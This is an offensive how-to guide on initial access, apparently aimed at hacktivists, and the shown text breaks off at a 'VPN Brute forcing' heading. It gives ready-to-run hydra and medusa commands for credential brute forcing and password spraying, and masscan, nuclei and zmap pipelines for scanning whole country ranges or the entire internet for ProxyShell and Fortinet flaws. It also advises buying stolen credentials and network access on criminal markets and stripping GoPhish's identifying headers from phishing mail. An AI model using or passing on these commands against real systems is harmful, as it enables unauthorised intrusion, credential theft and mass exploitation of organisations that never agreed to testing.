Initial Access Tactics, techniques and procedures
Phishing
Phishing is the most common attack method favored by advanced persistent threat groups and cyber criminal organized gangs. This is because it relies on social engineering to trick the target to either download a malicious email attachment or click on a malicious link.
Tools
- https://0xboku.com/2021/07/12/ArtOfDeviceCodePhish.html
- https://medium.com/maltrak/com-objects-p-2-your-stealthy-fileless-attack-bf78318d9165
- https://infosecwriteups.com/recipe-for-a-successful-phishing-campaign-part-1-2-dc23d927ec55
- https://www.xanthus.io/mastering-the-simulated-phishing-attack
- https://github.com/Arno0x/EmbedInHTML
- https://github.com/L4bF0x/PhishingPretexts
- http://lockboxx.blogspot.com/2018/12/gophish-evilginx2-for-phishing.html
- https://book.hacktricks.xyz/phishing-methodology
- https://outflank.nl/blog/2020/03/30/mark-of-the-web-from-a-red-teams-perspective
- https://delta.navisec.io/a-pentesters-guide-part-4-grabbing-hashes-and-forging-external-footholds/
- https://www.rootshellsecurity.net/ntlm_theft-a-tool-for-file-based-forced-ntlm-hash-disclosure/
- https://getgophish.com/ Be sure to remove the identifying headers gophish adds
- https://github.com/curtbraz/PhishAPI
- https://github.com/edoverflow/can-i-take-over-xyz
- https://blog.sublimesecurity.com/red-team-techniques-gaining-access-on-an-external-engagement-through-spear-phishing/
- Phishing with GoPhish and DigitalOcean: https://www.ired.team/offensive-security/initial-access/phishing-with-gophish-and-digitalocean | remove the identifying headers gophish adds
- Phishing with MS Office: https://www.ired.team/offensive-security/initial-access/phishing-with-ms-office
Password Attacks
Groups like Lapsus$ show's the world that you don't need to be a great technical hacker to pwn massive corporations and if common password and multi-factor authentication (MFA) attacks work on the likes of Uber, Rockstar games, Okta and so on then they will work on our hacktivist targets!
If your target uses multi-factor authentication you can try either social engineering or MFA fatigue.
Username creation based on recon/osint
Create a bespoke username word list based on OSINT, recon and your targets employee LinkedIn and other social media pofiles to aid in your password attacks.
- https://github.com/Mebus/cupp
- https://github.com/digininja/RSMangler
- https://github.com/sc0tfree/mentalist
- https://github.com/urbanadventurer/username-anarchy
- https://github.com/vysecurity/LinkedInt
- https://github.com/initstring/linkedin2username
- https://bitbucket.org/grimhacker/office365userenum/src/master
- https://github.com/shroudri/username_generator
- https://github.com/digininja/CeWL
Passwords
Common and leaked credentials to test login portals and network services.
Using seclists usernames and passwords output all username and password files into one big file:
Usernames:
find SecLists/Usernames/ -type f -exec cat {} + > usernames.txt
Passwords:
find SecLists/Passwords/ -type f -exec cat {} + > passwords.txt
- https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
- https://github.com/ihebski/DefaultCreds-cheat-sheet
- https://default-password.info
Password cracking tools
- https://www.kali.org/tools/ncrack
- https://www.kali.org/tools/wfuzz
- https://www.kali.org/tools/medusa
- https://www.kali.org/tools/patator
- https://www.kali.org/tools/hydra
- https://github.com/1N3/BruteX
- A basic example using a wordlist in the format of email:pass/user:pass. To know what the login form data looks like you can proxy a test login request using Burpsuite.
hydra -C creds.txt target.com -s 443 http-post-form "/login:username=^USER^&password=^PASS^:These credentials do not match our records." -S
- https://www.kali.org/tools/brutespray
Searching leaks
- https://github.com/khast3x/h8mail [Free but includes paid services]
Services
Please note: DO NOT use intelx[.]io as they have been seen doxing hackers in the past and block the use of Tor. AVOID!
You can use services that compile COMBO lists (leaked credentials) to search for your targets domain, then download the results and use them in a password attack to see whether or not your target recycles their credentials.
- https://haveibeenpwned.com
- https://leak-lookup.com [Paid. Accepts crypto (XMR & BTC)]
- https://dehashed.com [Paid. Accepts crypto (BTC)]
Once your leaks have been downloaded you can parse your results in the format, email:pass.
Password spraying
Employees commonly use recycled and weak credentials for convenience. If you already have valid passwords you can try and spray them across different services to test whether they have been recycled on other services or not. You can also take common passwords (Spring2023) and spray them hoping an employee uses a weak and guessable credential.
- https://github.com/dafthack/MSOLSpray
- https://pentestlab.blog/2019/09/05/microsoft-exchange-password-spraying
- https://github.com/blacklanternsecurity/TREVORspray
- https://github.com/knavesec/CredMaster
- https://github.com/xFreed0m/RDPassSpray
- https://github.com/dafthack/MailSniper
medusa -U usernames.txt -p Spring2023 -H targets.txt -M ssh -O results.txt
Hash cracking
Crack password hashes using both online and offline tools!
Identify hash:
Online tools:
- https://hashes.com/en/decrypt/hash [Free & Paid]
- https://crackstation.net
Offline tools:
- https://github.com/hashcat/hashcat
- https://github.com/openwall/john
- https://github.com/NotSoSecure/password_cracking_rules
Buying access
You can use the genesis market to purchase credentials stolen from targets through the use of info stealer malware. Search your target here to see if you can make a quick win gaining access to an admin account. Any account that allows internal access is always a great start. Invites can be found on forums and markets.
You can also find access brokers selling network access inside of companies on forums. Services include but is not limited to account credentials, shells, implants, and other remote management software (RDP, VPN, SSH, etc).
- https://xss.is
- https://exploit.in [Free & Paid]
Spray and pray
As seen by Guacamaya, hacktivists can benefit from a highly targeted spray and pray campaign whereby you scan IP ranges of countries of interest or your target companies IP ranges for critical vulnerabilities and attack protocols with a password attack. In the case of Guacamaya they scanned and exploited proxyshell and yoinked all their target emails out of their Microsoft exchange email servers and leaked them. You can also do the same! See scanning and recon for tools such as nuclei and the nmap scripting engine (NSE) to then vulnerability scan the IP addresses you discover. You can resolve the IP addresses to their respective domains (reverse DNS lookup) using nmap -Pn -sS -R -iL targets.txt -oA results
, however this is also done by default when performing a vulnerability scan using NSE.
IP Ranges:
- List all IP ranges from popular cloud providers: https://kaeferjaeger.gay/?dir=ip-ranges
- IP Address Ranges by Country: https://lite.ip2location.com/ip-address-ranges-by-country
- Scan the entire internet: 0.0.0.0/0
Vulnerability scanning
Scanning for and exploiting CVE vulnerabilities on public facing applications.
Tools
Scan IP ranges, output only ipv4 addresses and block known honeypots:
sudo masscan -Pn -sS -iL ranges.txt --rate 50000 -p443 --open-only --excludefile block.txt | grep -Eo '[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+' > results.txt
Add the port numbers to the end of discovered IPs in the format: ip-address:443
sed -i 's/$/:443/' results.txt
Vuln scan IPs:
nuclei -l results.txt -t nuclei-templates/http/cves/2021/CVE-2021-34473.yaml -o vulns.txt
Exploit: Proxyshell
Scan for multiple different ports:
sudo masscan -Pn -sS -iL ranges.txt --rate 50000 -p4443,10443,8443 --open-only --excludefile block.txt --output-format list --output-file results.txt
Add unique port numbers to the end of discovered IPs in the format: ip-address:port
awk '{ print $4 ":" $3 }' results.txt > final_results.txt
Vuln scan IPs:
nuclei -l final_results.txt -t nuclei-templates/http/cves/2018/CVE-2018-13379.yaml -o vulns.txt
Exploit: Fortinet SSL VPN Path Traversal
Guacamaya scanning for proxyshell using zmap and NSE:
sudo zmap -q -p 443 | httpx -silent -s -sd -location \ > | awk '/owa/ { print substr($1,9) }' > owa.txt
nmap -p 443 -Pn -n \ > --script http-vuln-exchange-proxyshell.nse -iL owa.txt
Password spray and pray
You can perform these attacks against protocols such as SSH, RDP, VPN, FTP, telnet, VNC, mysql.
Tools
Scan your target(s) for RDP (3389):
sudo masscan -Pn -sS -iL ranges.txt --rate 50000 -p3389 --open-only --excludefile block.txt | grep -Eo '[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+' > targets.txt
Now use RDP cracking tools against discovered IPs.
hydra -L usernames.txt -P passwords.txt -M targets.txt -t 16 rdp -o results
VPN Brute forcing: